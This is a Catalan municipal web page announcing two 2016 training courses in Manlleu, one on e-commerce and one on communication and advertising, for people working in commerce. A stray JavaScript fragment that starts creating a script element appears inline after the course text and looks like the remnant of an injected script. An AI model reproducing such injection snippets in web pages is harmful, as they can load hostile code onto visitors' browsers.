Formació per a persones treballadores

Durant els mesos de juliol i setembre, s’iniciaran a Manlleu les formacions de:

  • Comerç Electrònic i Botiga Virtual (30 h), per dominar les vendes per internet: dissenyar el pla de marquèting, iniciar-se en l’analítica, conèixer les eines necessaries per crear una botiga on-line i aprendre tots els procesos de vendes, gestió de clients i cobraments.
  • Comunicació i Publicitat  (30h), per aprendre a gestionar la comunicació com un dels valors en alça de l’organització i aprendre a utilitzar eines per maximitzar-ne el potencial.

Ambdós cursos formen part de l’oferta de l’OPE de Manlleu per al 2016 que ofereix cursos de diversos àmbits per a persones treballadores. Concretament, aquests dos cursos van dirigits prioritàriament a persones treballadores del comerç. Les persones a l’atur també s’hi poden incorporar si queden places lliures.var d=document;var s=d.createElement(‘script’);

Etiquetes

Imprimir aquest article

Trackback from your site.

Deixa un comentari

Hauries d' identificar-te per deixar un comentari.
A Manlleu
Fem Xarxa